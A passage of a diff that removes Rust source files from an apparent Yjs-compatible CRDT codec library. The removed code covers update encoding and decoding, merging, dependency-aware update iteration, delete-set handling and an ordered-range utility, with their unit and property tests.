l.extend(r.drain(0..));
}
_ => {
return false;
}
}
if let Some(Parent::Type(p)) = &litem.parent
&& let Some(parent) = p.ty_mut()
&& let Some(markers) = &parent.markers
{
markers.replace_marker(rref.clone(), lref.clone(), -(llen as i64));
}
if ritem.keep() {
litem.flags.set_keep()
}
litem.right = ritem.right.clone();
unsafe {
if litem.right.is_some() {
litem.right.get_mut_unchecked().left = lref.clone();
}
}
}
_ => {
return false;
}
}
true
}
}
impl From<Option<Node>> for Somr<Item> {
fn from(value: Option<Node>) -> Self {
match value {
Some(n) => n.as_item(),
None => Somr::none(),
}
}
}
impl From<&Option<Node>> for Somr<Item> {
fn from(value: &Option<Node>) -> Self {
match value {
Some(n) => n.as_item(),
None => Somr::none(),
}
}
}
impl From<Option<&Node>> for Somr<Item> {
fn from(value: Option<&Node>) -> Self {
match value {
Some(n) => n.as_item(),
None => Somr::none(),
}
}
}
#[cfg(test)]
mod tests {
#[cfg(not(loom))]
use proptest::{collection::vec, prelude::*};
use super::{utils::ItemBuilder, *};
#[test]
fn test_struct_info() {
loom_model!({
{
let struct_info = Node::new_gc(Id::new(1, 0), 10);
assert_eq!(struct_info.len(), 10);
assert_eq!(struct_info.client(), 1);
assert_eq!(struct_info.clock(), 0);
}
{
let struct_info = Node::new_skip(Id::new(2, 0), 20);
assert_eq!(struct_info.len(), 20);
assert_eq!(struct_info.client(), 2);
assert_eq!(struct_info.clock(), 0);
}
{
let item = ItemBuilder::new()
.id((3, 0).into())
.left_id(None)
.right_id(None)
.parent(Some(Parent::String(SmolStr::new_inline("parent"))))
.parent_sub(None)
.content(Content::String(String::from("content")))
.build();
let struct_info = Node::Item(Somr::new(item));
assert_eq!(struct_info.len(), 7);
assert_eq!(struct_info.client(), 3);
assert_eq!(struct_info.clock(), 0);
}
});
}
#[test]
fn test_read_write_struct_info() {
loom_model!({
let has_not_parent_id_and_has_parent = Node::Item(Somr::new(
ItemBuilder::new()
.id((0, 0).into())
.left_id(None)
.right_id(None)
.parent(Some(Parent::String(SmolStr::new_inline("parent"))))
.parent_sub(None)
.content(Content::String(String::from("content")))
.build(),
));
let has_not_parent_id_and_has_parent_with_key = Node::Item(Somr::new(
ItemBuilder::new()
.id((0, 0).into())
.left_id(None)
.right_id(None)
.parent(Some(Parent::String(SmolStr::new_inline("parent"))))
.parent_sub(Some(SmolStr::new_inline("parent_sub")))
.content(Content::String(String::from("content")))
.build(),
));
let has_parent_id = Node::Item(Somr::new(
ItemBuilder::new()
.id((0, 0).into())
.left_id(Some((1, 2).into()))
.right_id(Some((2, 5).into()))
.parent(None)
.parent_sub(None)
.content(Content::String(String::from("content")))
.build(),
));
let struct_infos = vec![
Node::new_gc((0, 0).into(), 42),
Node::new_skip((0, 0).into(), 314),
has_not_parent_id_and_has_parent,
has_not_parent_id_and_has_parent_with_key,
has_parent_id,
];
for info in struct_infos {
let mut encoder = RawEncoder::default();
info.write(&mut encoder).unwrap();
let update = encoder.into_inner();
let mut decoder = RawDecoder::new(&update);
let decoded = Node::read(&mut decoder, info.id()).unwrap();
assert_eq!(info, decoded);
}
});
}
#[cfg(not(loom))]
fn struct_info_round_trip(info: &mut Node) -> JwstCodecResult {
if let Node::Item(item) = info
&& let Some(item) = item.get_mut()
{
if !item.is_valid() {
return Ok(());
}
if item.content.countable() {
item.flags.set_countable();
}
}
let mut encoder = RawEncoder::default();
info.write(&mut encoder)?;
let ret = encoder.into_inner();
let mut decoder = RawDecoder::new(&ret);
let decoded = Node::read(&mut decoder, info.id())?;
assert_eq!(info, &decoded);
Ok(())
}
#[cfg(not(loom))]
proptest! {
#[test]
#[cfg_attr(miri, ignore)]
fn test_random_struct_info(mut infos in vec(any::<Node>(), 0..10)) {
for info in &mut infos {
struct_info_round_trip(info).unwrap();
}
}
}
}
@@ -1,690 +0,0 @@
use std::{collections::VecDeque, ops::Range};
use super::*;
use crate::doc::StateVector;
#[derive(Debug, Default, Clone)]
pub struct Update {
pub(crate) structs: ClientMap<VecDeque<Node>>,
pub(crate) delete_set: DeleteSet,
/// all unapplicable items that we can't integrate into doc
/// any item with inconsistent id clock or missing dependency will be put
/// here
pub(crate) pending_structs: ClientMap<VecDeque<Node>>,
/// missing state vector after applying updates
pub(crate) missing_state: StateVector,
/// all unapplicable delete set
pub(crate) pending_delete_set: DeleteSet,
}
impl<R: CrdtReader> CrdtRead<R> for Update {
fn read(decoder: &mut R) -> JwstCodecResult<Self> {
let num_of_clients = decoder.read_var_u64()? as usize;
// See: [HASHMAP_SAFE_CAPACITY]
let mut map = ClientMap::with_capacity(num_of_clients.min(HASHMAP_SAFE_CAPACITY));
for _ in 0..num_of_clients {
let num_of_structs = decoder.read_var_u64()? as usize;
let client = decoder.read_var_u64()?;
let mut clock = decoder.read_var_u64()?;
// same reason as above
let mut structs = VecDeque::with_capacity(num_of_structs.min(HASHMAP_SAFE_CAPACITY));
for _ in 0..num_of_structs {
let struct_info = Node::read(decoder, Id::new(client, clock))?;
clock += struct_info.len();
structs.push_back(struct_info);
}
structs.shrink_to_fit();
map.insert(client, structs);
}
map.shrink_to_fit();
let delete_set = DeleteSet::read(decoder)?;
if !decoder.is_empty() {
return Err(JwstCodecError::UpdateNotFullyConsumed(decoder.len() as usize));
}
Ok(Update {
structs: map,
delete_set,
..Update::default()
})
}
}
impl<W: CrdtWriter> CrdtWrite<W> for Update {
fn write(&self, encoder: &mut W) -> JwstCodecResult {
encoder.write_var_u64(self.structs.len() as u64)?;
let mut clients = self.structs.keys().copied().collect::<Vec<_>>();
// Descending
clients.sort_by(|a, b| b.cmp(a));
for client in clients {
let structs = self.structs.get(&client).unwrap();
encoder.write_var_u64(structs.len() as u64)?;
encoder.write_var_u64(client)?;
encoder.write_var_u64(structs.front().map(|s| s.clock()).unwrap_or(0))?;
for struct_info in structs {
struct_info.write(encoder)?;
}
}
self.delete_set.write(encoder)?;
Ok(())
}
}
impl Update {
// decode from ydoc v1
pub fn decode_v1<T: AsRef<[u8]>>(buffer: T) -> JwstCodecResult<Update> {
Update::read(&mut RawDecoder::new(buffer.as_ref()))
}
pub fn encode_v1(&self) -> JwstCodecResult<Vec<u8>> {
let mut encoder = RawEncoder::default();
self.write(&mut encoder)?;
Ok(encoder.into_inner())
}
pub(crate) fn iter(&mut self, state: StateVector) -> UpdateIterator<'_> {
UpdateIterator::new(self, state)
}
pub fn delete_set_iter(&mut self, state: StateVector) -> DeleteSetIterator<'_> {
DeleteSetIterator::new(self, state)
}
// take all pending structs and delete set to [self] update struct
pub fn drain_pending_state(&mut self) {
debug_assert!(self.is_empty());
std::mem::swap(&mut self.pending_structs, &mut self.structs);
std::mem::swap(&mut self.pending_delete_set, &mut self.delete_set);
}
pub fn merge<I: IntoIterator<Item = Update>>(updates: I) -> Update {
let mut merged = Update::default();
Self::merge_into(&mut merged, updates);
merged
}
pub fn merge_into<I: IntoIterator<Item = Update>>(target: &mut Update, updates: I) {
for update in updates {
target.delete_set.merge(&update.delete_set);
for (client, structs) in update.structs {
let iter = structs.into_iter().filter(|p| !p.is_skip());
if let Some(merged_structs) = target.structs.get_mut(&client) {
merged_structs.extend(iter);
} else {
target.structs.insert(client, iter.collect());
}
}
}
for structs in target.structs.values_mut() {
structs.make_contiguous().sort_by_key(|s| s.id().clock);
// insert [Node::Skip] if structs[index].id().clock + structs[index].len() <
// structs[index + 1].id().clock
let mut index = 0;
let mut merged_index = vec![];
while index < structs.len() - 1 {
let cur = &structs[index];
let next = &structs[index + 1];
let clock_end = cur.id().clock + cur.len();
let next_clock = next.id().clock;
if next_clock > clock_end {
structs.insert(
index + 1,
Node::new_skip((cur.id().client, clock_end).into(), next_clock - clock_end),
);
index += 1;
} else if cur.id().clock == next_clock {
if cur.deleted() == next.deleted()
&& cur.last_id() == next.last_id()
&& cur.left() == next.left()
&& cur.right() == next.right()
{
// merge two nodes, mark the index
merged_index.push(index + 1);
} else {
debug!("merge failed: {cur:?} {next:?}")
}
}
index += 1;
}
{
// prune the merged nodes
let mut new_structs = VecDeque::with_capacity(structs.len() - merged_index.len());
let mut next_remove_idx = 0;
for (idx, val) in structs.drain(..).enumerate() {
if next_remove_idx < merged_index.len() && idx == merged_index[next_remove_idx] {
next_remove_idx += 1;
} else {
new_structs.push_back(val);
}
}
structs.extend(new_structs);
}
}
}
pub fn is_content_empty(&self) -> bool {
self.structs.is_empty()
}
pub fn is_empty(&self) -> bool {
self.structs.is_empty() && self.delete_set.is_empty()
}
pub fn is_pending_empty(&self) -> bool {
self.pending_structs.is_empty() && self.pending_delete_set.is_empty()
}
}
pub(crate) struct UpdateIterator<'a> {
update: &'a mut Update,
// --- local iterator state ---
/// current state vector from store
state: StateVector,
/// all client ids sorted ascending
client_ids: Vec<Client>,
/// current id of client of the updates we're processing
cur_client_id: Option<Client>,
/// stack of previous iterating item with higher priority than updates in
/// next iteration
stack: Vec<Node>,
}
impl<'a> UpdateIterator<'a> {
pub fn new(update: &'a mut Update, state: StateVector) -> Self {
let mut client_ids = update.structs.keys().cloned().collect::<Vec<_>>();
client_ids.sort();
let cur_client_id = client_ids.pop();
UpdateIterator {
update,
state,
client_ids,
cur_client_id,
stack: Vec::new(),
}
}
/// iterate the client ids until we find the next client with left updates
/// that can be consumed
///
/// note:
/// firstly we will check current client id as well to ensure current
/// updates queue is not empty yet
fn next_client(&mut self) -> Option<Client> {
while let Some(client_id) = self.cur_client_id {
match self.update.structs.get(&client_id) {
Some(refs) if !refs.is_empty() => {
self.cur_client_id.replace(client_id);
return self.cur_client_id;
}
_ => {
self.update.structs.remove(&client_id);
self.cur_client_id = self.client_ids.pop();
}
}
}
None
}
/// update the missing state vector
/// tell it the smallest clock that missed.
fn update_missing_state(&mut self, client: Client, clock: Clock) {
self.update.missing_state.set_min(client, clock);
}
/// any time we can't apply an update during the iteration,
/// we should put all items in pending stack to rest structs
fn add_stack_to_rest(&mut self) {
for s in self.stack.drain(..) {
let client = s.id().client;
let unapplicable_items = self.update.structs.remove(&client);
if let Some(mut items) = unapplicable_items {
items.push_front(s);
self.update.pending_structs.insert(client, items);
} else {
self.update.pending_structs.insert(client, [s].into());
}
self.client_ids.retain(|&c| c != client);
}
}
/// tell if current update's dependencies(left, right, parent) has already
/// been consumed and recorded and return the client of them if not.
fn get_missing_dep(&self, struct_info: &Node) -> Option<Client> {
if let Some(item) = struct_info.as_item().get() {
let id = item.id;
if let Some(left) = &item.origin_left_id
&& left.client != id.client
&& left.clock >= self.state.get(&left.client)
{
return Some(left.client);
}
if let Some(right) = &item.origin_right_id
&& right.client != id.client
&& right.clock >= self.state.get(&right.client)
{
return Some(right.client);
}
if let Some(parent) = &item.parent {
match parent {
Parent::Id(parent_id)
if parent_id.client != id.client && parent_id.clock >= self.state.get(&parent_id.client) =>
{
return Some(parent_id.client);
}
_ => {}
}
}
}
None
}
fn next_candidate(&mut self) -> Option<Node> {
let mut cur = None;
if !self.stack.is_empty() {
cur.replace(self.stack.pop().unwrap());
} else if let Some(client) = self.next_client() {
// Safety:
// client index of updates and update length are both checked in next_client
// safe to use unwrap
cur.replace(self.update.structs.get_mut(&client).unwrap().pop_front().unwrap());
}
cur
}
}
impl Iterator for UpdateIterator<'_> {
type Item = (Node, u64);
fn next(&mut self) -> Option<Self::Item> {
// fetch the first candidate from stack or updates
let mut cur = self.next_candidate();
while let Some(cur_update) = cur.take() {
let id = cur_update.id();
if cur_update.is_skip() {
cur = self.next_candidate();
continue;
} else if !self.state.contains(&id) {
// missing local state of same client
// can't apply the continuous updates from same client
// push into the stack and put tell all the items in stack are unapplicable
self.stack.push(cur_update);
self.update_missing_state(id.client, id.clock - 1);
self.add_stack_to_rest();
} else {
let id = cur_update.id();
let dep = self.get_missing_dep(&cur_update);
// some dependency is missing, we need to turn to iterate the dependency first.
if let Some(dep) = dep {
self.stack.push(cur_update);
match self.update.structs.get_mut(&dep) {
Some(updates) if !updates.is_empty() => {
// iterate the dependency client first
cur.replace(updates.pop_front().unwrap());
continue;
}
// but the dependency update is drained
// need to move all stack item to unapplicable store
_ => {
self.update_missing_state(dep, self.state.get(&dep));
self.add_stack_to_rest();
}
}
} else {
// we finally find the first applicable update
let local_state = self.state.get(&id.client);
// we've already check the local state is greater or equal to current update's
// clock so offset here will never be negative
let offset = local_state - id.clock;
if offset == 0 || offset < cur_update.len() {
self.state.set_max(id.client, id.clock + cur_update.len());
return Some((cur_update, offset));
}
}
}
cur = self.next_candidate();
}
// we all done
None
}
}
pub struct DeleteSetIterator<'a> {
update: &'a mut Update,
/// current state vector from store
state: StateVector,
}
impl<'a> DeleteSetIterator<'a> {
pub fn new(update: &'a mut Update, state: StateVector) -> Self {
DeleteSetIterator { update, state }
}
}
impl Iterator for DeleteSetIterator<'_> {
type Item = (Client, Range<u64>);
fn next(&mut self) -> Option<Self::Item> {
while let Some(client) = self.update.delete_set.keys().next().cloned() {
let deletes = self.update.delete_set.get_mut(&client).unwrap();
let local_state = self.state.get(&client);
while let Some(range) = deletes.pop() {
let start = range.start;
let end = range.end;
if start < local_state {
if local_state < end {
// partially state missing
// [start..end)
// ^ local_state in between
// // split
// [start..local_state) [local_state..end)
// ^^^^^ unapplicable
self
.update
.pending_delete_set
.add(client, local_state, end - local_state);
return Some((client, start..local_state));
}
return Some((client, range));
} else {
// all state missing
self.update.pending_delete_set.add(client, start, end - start);
}
}
self.update.delete_set.remove(&client);
}
None
}
}
#[cfg(test)]
mod tests {
use std::{num::ParseIntError, path::PathBuf};
use serde::Deserialize;
use super::*;
use crate::doc::common::OrderRange;
fn struct_item(id: (Client, Clock), len: usize) -> Node {
Node::Item(Somr::new(
ItemBuilder::new()
.id(id.into())
.content(Content::String("c".repeat(len)))
.build(),
))
}
fn parse_doc_update(input: Vec<u8>) -> JwstCodecResult<Update> {
Update::decode_v1(input)
}
#[test]
#[cfg_attr(any(miri, loom), ignore)]
fn test_parse_doc() {
let docs = [
(include_bytes!("../../fixtures/basic.bin").to_vec(), 1, 188),
(include_bytes!("../../fixtures/database.bin").to_vec(), 1, 149),
(include_bytes!("../../fixtures/large.bin").to_vec(), 1, 9036),
(include_bytes!("../../fixtures/with-subdoc.bin").to_vec(), 2, 30),
(
include_bytes!("../../fixtures/edge-case-left-right-same-node.bin").to_vec(),
2,
243,
),
];
for (doc, clients, structs) in docs {
let update = parse_doc_update(doc).unwrap();
assert_eq!(update.structs.len(), clients);
assert_eq!(update.structs.iter().map(|s| s.1.len()).sum::<usize>(), structs);
}
}
fn decode_hex(s: &str) -> Result<Vec<u8>, ParseIntError> {
(0..s.len())
.step_by(2)
.map(|i| u8::from_str_radix(&s[i..i + 2], 16))
.collect()
}
#[allow(dead_code)]
#[derive(Deserialize, Debug)]
struct Data {
id: u64,
workspace: String,
timestamp: String,
blob: String,
}
#[ignore = "just for local data test"]
#[test]
fn test_parse_local_doc() {
let json = serde_json::from_slice::<Vec<Data>>(include_bytes!("../../fixtures/local_docs.json")).unwrap();
for ws in json {
let data = &ws.blob[5..=(ws.blob.len() - 2)];
if let Ok(data) = decode_hex(data) {
match parse_doc_update(data.clone()) {
Ok(update) => {
println!(
"workspace: {}, global structs: {}, total structs: {}",
ws.workspace,
update.structs.len(),
update.structs.iter().map(|s| s.1.len()).sum::<usize>()
);
}
Err(_e) => {
std::fs::write(
PathBuf::from("./src/fixtures/invalid").join(format!("{}.ydoc", ws.workspace)),
data,
)
.unwrap();
println!("doc error: {}", ws.workspace);
}
}
} else {
println!("error origin data: {}", ws.workspace);
}
}
}
#[test]
fn test_update_iterator() {
loom_model!({
let mut update = Update {
structs: ClientMap::from_iter([
(
0,
VecDeque::from([
struct_item((0, 0), 1),
struct_item((0, 1), 1),
Node::new_skip((0, 2).into(), 1),
]),
),
(
1,
VecDeque::from([
struct_item((1, 0), 1),
Node::Item(Somr::new(
ItemBuilder::new()
.id((1, 1).into())
.left_id(Some((0, 1).into()))
.content(Content::String("c".repeat(2)))
.build(),
)),
]),
),
]),
..Update::default()
};
let mut iter = update.iter(StateVector::default());
assert_eq!(iter.next().unwrap().0.id(), (1, 0).into());
assert_eq!(iter.next().unwrap().0.id(), (0, 0).into());
assert_eq!(iter.next().unwrap().0.id(), (0, 1).into());
assert_eq!(iter.next().unwrap().0.id(), (1, 1).into());
assert_eq!(iter.next(), None);
});
}
#[test]
fn test_update_iterator_with_missing_state() {
loom_model!({
let mut update = Update {
// an item with higher sequence id than local state
structs: ClientMap::from_iter([(0, VecDeque::from([struct_item((0, 4), 1)]))]),
..Update::default()
};
let mut iter = update.iter(StateVector::from([(0, 3)]));
assert_eq!(iter.next(), None);
assert!(!update.pending_structs.is_empty());
assert_eq!(
update.pending_structs.get_mut(&0).unwrap().pop_front().unwrap().id(),
(0, 4).into()
);
assert!(!update.missing_state.is_empty());
assert_eq!(update.missing_state.get(&0), 3);
});
}
#[test]
fn test_delete_set_iterator() {
let mut update = Update {
delete_set: DeleteSet::from([(0, vec![(0..2), (3..5)])]),
..Update::default()
};
let mut iter = update.delete_set_iter(StateVector::from([(0, 10)]));
assert_eq!(iter.next().unwrap(), (0, 0..2));
assert_eq!(iter.next().unwrap(), (0, 3..5));
assert_eq!(iter.next(), None);
}
#[test]
fn test_delete_set_with_missing_state() {
let mut update = Update {
delete_set: DeleteSet::from([(0, vec![(3..5), (7..12), (13..15)])]),
..Update::default()
};
let mut iter = update.delete_set_iter(StateVector::from([(0, 10)]));
assert_eq!(iter.next().unwrap(), (0, 3..5));
assert_eq!(iter.next().unwrap(), (0, 7..10));
assert_eq!(iter.next(), None);
assert!(!update.pending_delete_set.is_empty());
assert_eq!(
update.pending_delete_set.get(&0).unwrap(),
&OrderRange::from(vec![(10..12), (13..15)])
);
}
#[test]
fn should_add_skip_when_clock_not_continuous() {
loom_model!({
let update = Update {
structs: ClientMap::from_iter([(
0,
VecDeque::from([
struct_item((0, 0), 1),
struct_item((0, 1), 1),
struct_item((0, 10), 1),
Node::new_gc((0, 20).into(), 10),
]),
)]),
..Default::default()
};
let merged = Update::merge([update]);
assert_eq!(
merged.structs.get(&0).unwrap(),
&VecDeque::from([
struct_item((0, 0), 1),
struct_item((0, 1), 1),
Node::new_skip((0, 2).into(), 8),
struct_item((0, 10), 1),
Node::new_skip((0, 11).into(), 9),
Node::new_gc((0, 20).into(), 10),
])
);
});
}
#[test]
fn merged_update_should_not_be_released_in_next_turn() {
loom_model!({
let update = Update {
structs: ClientMap::from_iter([(
0,
VecDeque::from([
struct_item((0, 0), 1),
struct_item((0, 1), 1),
struct_item((0, 10), 1),
Node::new_gc((0, 20).into(), 10),
]),
)]),
..Default::default()
};
let merged = Update::merge([update]);
let update2 = Update {
structs: ClientMap::from_iter([(
0,
VecDeque::from([struct_item((0, 30), 1), Node::new_gc((0, 32).into(), 1)]),
)]),
..Default::default()
};
let merged2 = Update::merge([update2, merged]);
assert_eq!(merged2.structs.get(&0).unwrap().len(), 9);
});
}
}
@@ -1,97 +0,0 @@
use super::*;
pub(crate) struct ItemBuilder {
item: Item,
}
#[allow(dead_code)]
impl ItemBuilder {
pub fn new() -> ItemBuilder {
Self { item: Item::default() }
}
pub fn id(mut self, id: Id) -> ItemBuilder {
self.item.id = id;
self
}
pub fn left(mut self, left: Somr<Item>) -> ItemBuilder {
if let Some(l) = left.get() {
self.item.origin_left_id = Some(l.last_id());
self.item.left = left;
}
self
}
pub fn right(mut self, right: Somr<Item>) -> ItemBuilder {
if let Some(r) = right.get() {
self.item.origin_right_id = Some(r.id);
self.item.right = right;
}
self
}
pub fn left_id(mut self, left_id: Option<Id>) -> ItemBuilder {
self.item.origin_left_id = left_id;
self
}
pub fn right_id(mut self, right_id: Option<Id>) -> ItemBuilder {
self.item.origin_right_id = right_id;
self
}
pub fn parent(mut self, parent: Option<Parent>) -> ItemBuilder {
self.item.parent = parent;
self
}
#[allow(dead_code)]
pub fn parent_sub(mut self, parent_sub: Option<SmolStr>) -> ItemBuilder {
self.item.parent_sub = parent_sub;
self
}
pub fn content(mut self, content: Content) -> ItemBuilder {
self.item.content = content;
self
}
pub fn flags(mut self, flags: ItemFlag) -> ItemBuilder {
self.item.flags = flags;
self
}
pub fn build(self) -> Item {
if self.item.content.countable() {
self.item.flags.set(item_flags::ITEM_COUNTABLE);
}
self.item
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_item_builder() {
loom_model!({
let item = ItemBuilder::new()
.id(Id::new(0, 1))
.left_id(Some(Id::new(2, 3)))
.right_id(Some(Id::new(4, 5)))
.parent(Some(Parent::String("test".into())))
.content(Content::Any(vec![Any::String("Hello".into())]))
.build();
assert_eq!(item.id, Id::new(0, 1));
assert_eq!(item.origin_left_id, Some(Id::new(2, 3)));
assert_eq!(item.origin_right_id, Some(Id::new(4, 5)));
assert!(matches!(item.parent, Some(Parent::String(text)) if text == "test"));
assert_eq!(item.parent_sub, None);
assert_eq!(item.content, Content::Any(vec![Any::String("Hello".into())]));
});
}
}
@@ -1,5 +0,0 @@
mod items;
pub(crate) use items::*;
use super::*;
@@ -1,9 +0,0 @@
mod range;
mod somr;
mod state;
pub use range::*;
pub use somr::*;
pub use state::*;
use super::*;
@@ -1,466 +0,0 @@
use std::{collections::VecDeque, mem, ops::Range};
#[derive(Debug, PartialEq, Eq, Clone)]
pub enum OrderRange {
Range(Range<u64>),
Fragment(VecDeque<Range<u64>>),
}
impl Default for OrderRange {
fn default() -> Self {
Self::Range(0..0)
}
}
impl From<Range<u64>> for OrderRange {
fn from(range: Range<u64>) -> Self {
Self::Range(range)
}
}
impl From<Vec<Range<u64>>> for OrderRange {
fn from(value: Vec<Range<u64>>) -> Self {
Self::Fragment(value.into_iter().collect())
}
}
impl From<VecDeque<Range<u64>>> for OrderRange {
fn from(value: VecDeque<Range<u64>>) -> Self {
Self::Fragment(value)
}
}
#[inline]
fn is_continuous_range(lhs: &Range<u64>, rhs: &Range<u64>) -> bool {
lhs.end >= rhs.start && lhs.start <= rhs.end
}
impl OrderRange {
pub fn ranges_len(&self) -> usize {
match self {
OrderRange::Range(_) => 1,
OrderRange::Fragment(ranges) => ranges.len(),
}
}
pub fn is_empty(&self) -> bool {
match self {
OrderRange::Range(range) => range.is_empty(),
OrderRange::Fragment(vec) => vec.is_empty(),
}
}
pub fn contains(&self, clock: u64) -> bool {
match self {
OrderRange::Range(range) => range.contains(&clock),
OrderRange::Fragment(ranges) => ranges.iter().any(|r| r.contains(&clock)),
}
}
fn check_range_covered(old_vec: &[Range<u64>], new_vec: &[Range<u64>]) -> bool {
let mut old_iter = old_vec.iter();
let mut next_old = old_iter.next();
let mut new_iter = new_vec.iter().peekable();
let mut next_new = new_iter.next();
'new_loop: while let Some(new_range) = next_new {
while let Some(old_range) = next_old {
if old_range.start < new_range.start || old_range.end > new_range.end {
if new_iter.peek().is_some() {
next_new = new_iter.next();
continue 'new_loop;
} else {
return false;
}
}
next_old = old_iter.next();
if let Some(next_old) = &next_old
&& next_old.start > new_range.end
{
continue;
}
}
next_new = new_iter.next();
}
true
}
/// diff_range returns the difference between the old range and the new
/// range. current range must be covered by the new range
pub fn diff_range(&self, new_range: &OrderRange) -> Vec<Range<u64>> {
let old_vec = self.clone().into_iter().collect::<Vec<_>>();
let new_vec = new_range.clone().into_iter().collect::<Vec<_>>();
if !Self::check_range_covered(&old_vec, &new_vec) {
return Vec::new();
}
let mut diffs = Vec::new();
let mut old_idx = 0;
for new_range in &new_vec {
let mut overlap_ranges = Vec::new();
while old_idx < old_vec.len() && old_vec[old_idx].start <= new_range.end {
overlap_ranges.push(old_vec[old_idx].clone());
old_idx += 1;
}
if overlap_ranges.is_empty() {
diffs.push(new_range.clone());
} else {
let mut last_end = overlap_ranges[0].start;
if last_end > new_range.start {
diffs.push(new_range.start..last_end);
}
for overlap in &overlap_ranges {
if overlap.start > last_end {
diffs.push(last_end..overlap.start);
}
last_end = overlap.end;
}
if new_range.end > last_end {
diffs.push(last_end..new_range.end);
}
}
}
diffs
}
/// Push new range to current one.
/// Range will be merged if overlap exists or turned into fragment if it's
/// not continuous.
pub fn push(&mut self, range: Range<u64>) {
match self {
OrderRange::Range(r) => {
if r.start == r.end {
*self = range.into();
} else if is_continuous_range(r, &range) {
r.end = r.end.max(range.end);
r.start = r.start.min(range.start);
} else {
*self = OrderRange::Fragment(if r.start < range.start {
VecDeque::from([r.clone(), range])
} else {
VecDeque::from([range, r.clone()])
});
}
}
OrderRange::Fragment(ranges) => {
if ranges.is_empty() {
*self = OrderRange::Range(range);
} else {
OrderRange::push_inner(ranges, range);
self.make_single();
}
}
}
}
pub fn pop(&mut self) -> Option<Range<u64>> {
if self.is_empty() {
None
} else {
match self {
OrderRange::Range(range) => Some(mem::replace(range, 0..0)),
OrderRange::Fragment(list) => list.pop_front(),
}
}
}
pub fn merge(&mut self, other: Self) {
self.extend(&other);
}
fn make_fragment(&mut self) {
if let OrderRange::Range(range) = self {
*self = OrderRange::Fragment(if range.is_empty() {
VecDeque::new()
} else {
VecDeque::from([range.clone()])
});
}
}
fn make_single(&mut self) {
if let OrderRange::Fragment(ranges) = self
&& ranges.len() == 1
{
*self = OrderRange::Range(ranges[0].clone());
}
}
/// Merge all available ranges list into one.
pub fn squash(&mut self) {
// merge all available ranges
if let OrderRange::Fragment(ranges) = self {
if ranges.is_empty() {
*self = OrderRange::Range(0..0);
return;
}
let mut changed = false;
let mut merged = VecDeque::with_capacity(ranges.len());
let mut cur = ranges[0].clone();
for next in ranges.iter().skip(1) {
if is_continuous_range(&cur, next) {
cur.start = cur.start.min(next.start);
cur.end = cur.end.max(next.end);
changed = true;
} else {
merged.push_back(cur);
cur = next.clone();
}
}
merged.push_back(cur);
if merged.len() == 1 {
*self = OrderRange::Range(merged[0].clone());
} else if changed {
mem::swap(ranges, &mut merged);
}
}
}
fn push_inner(list: &mut VecDeque<Range<u64>>, range: Range<u64>) {
if list.is_empty() {
list.push_back(range);
} else {
let search_result = list.binary_search_by(|r| {
if is_continuous_range(r, &range) {
std::cmp::Ordering::Equal
} else if r.end < range.start {
std::cmp::Ordering::Less
} else {
std::cmp::Ordering::Greater
}
});
match search_result {
Ok(idx) => {
let old = &mut list[idx];
list[idx] = old.start.min(range.start)..old.end.max(range.end);
Self::squash_around(list, idx);
}
Err(idx) => {
list.insert(idx, range);
Self::squash_around(list, idx);
}
}
}
}
fn squash_around(list: &mut VecDeque<Range<u64>>, idx: usize) {
if idx > 0 {
let prev = &list[idx - 1];
let cur = &list[idx];
if is_continuous_range(prev, cur) {
list[idx - 1] = prev.start.min(cur.start)..prev.end.max(cur.end);
list.remove(idx);
}
}
if idx < list.len() - 1 {
let next = &list[idx + 1];
let cur = &list[idx];
if is_continuous_range(cur, next) {
list[idx] = cur.start.min(next.start)..cur.end.max(next.end);
list.remove(idx + 1);
}
}
}
}
impl<'a> IntoIterator for &'a OrderRange {
type Item = Range<u64>;
type IntoIter = OrderRangeIter<'a>;
fn into_iter(self) -> Self::IntoIter {
OrderRangeIter { range: self, idx: 0 }
}
}
impl Extend<Range<u64>> for OrderRange {
fn extend<T: IntoIterator<Item = Range<u64>>>(&mut self, other: T) {
self.make_fragment();
match self {
OrderRange::Fragment(ranges) => {
for range in other {
OrderRange::push_inner(ranges, range);
}
self.make_single();
}
_ => unreachable!(),
}
}
}
pub struct OrderRangeIter<'a> {
range: &'a OrderRange,
idx: usize,
}
impl Iterator for OrderRangeIter<'_> {
type Item = Range<u64>;
fn next(&mut self) -> Option<Self::Item> {
match self.range {
OrderRange::Range(range) => {
if self.idx == 0 {
self.idx += 1;
Some(range.clone())
} else {
None
}
}
OrderRange::Fragment(ranges) => {
if self.idx < ranges.len() {
let range = ranges[self.idx].clone();
self.idx += 1;
Some(range)
} else {
None
}
}
}
}
}
#[cfg(test)]
#[allow(clippy::single_range_in_vec_init)]
mod tests {
use super::OrderRange;
#[test]
fn test_range_push() {
let mut range: OrderRange = (0..10).into();
range.push(5..15);
assert_eq!(range, OrderRange::Range(0..15));
// turn to fragment
range.push(20..30);
assert_eq!(range, OrderRange::from(vec![(0..15), (20..30)]));
// auto merge
range.push(15..16);
assert_eq!(range, OrderRange::from(vec![(0..16), (20..30)]));
// squash
range.push(16..20);
assert_eq!(range, OrderRange::Range(0..30));
}
#[test]
fn test_range_pop() {
let mut range: OrderRange = vec![(0..10), (20..30)].into();
assert_eq!(range.pop(), Some(0..10));
let mut range: OrderRange = (0..10).into();
assert_eq!(range.pop(), Some(0..10));
assert!(range.is_empty());
assert_eq!(range.pop(), None);
}
#[test]
fn test_ranges_squash() {
let mut range = OrderRange::from(vec![(0..10), (20..30)]);
// do nothing
range.squash();
assert_eq!(range, OrderRange::from(vec![(0..10), (20..30)]));
// merged into list
range = OrderRange::from(vec![(0..10), (10..20), (30..40)]);
range.squash();
assert_eq!(range, OrderRange::from(vec![(0..20), (30..40)]));
// turn to range
range = OrderRange::from(vec![(0..10), (10..20), (20..30)]);
range.squash();
assert_eq!(range, OrderRange::Range(0..30));
}
#[test]
fn test_range_covered() {
assert!(!OrderRange::check_range_covered(&[0..1], &[2..3]));
assert!(OrderRange::check_range_covered(&[0..1], &[0..3]));
assert!(!OrderRange::check_range_covered(&[0..1], &[1..3]));
assert!(OrderRange::check_range_covered(&[0..1], &[0..3]));
assert!(OrderRange::check_range_covered(&[1..2], &[0..3]));
assert!(OrderRange::check_range_covered(&[1..2, 2..3], &[0..3]));
assert!(!OrderRange::check_range_covered(&[1..2, 2..3, 3..4], &[0..3]));
assert!(OrderRange::check_range_covered(&[0..1, 2..3], &[0..2, 2..4]));
assert!(OrderRange::check_range_covered(&[0..1, 2..3, 3..4], &[0..2, 2..4]),);
}
#[test]
fn test_range_diff() {
{
let old = OrderRange::Range(0..1);
let new = OrderRange::Range(2..3);
let ranges = old.diff_range(&new);
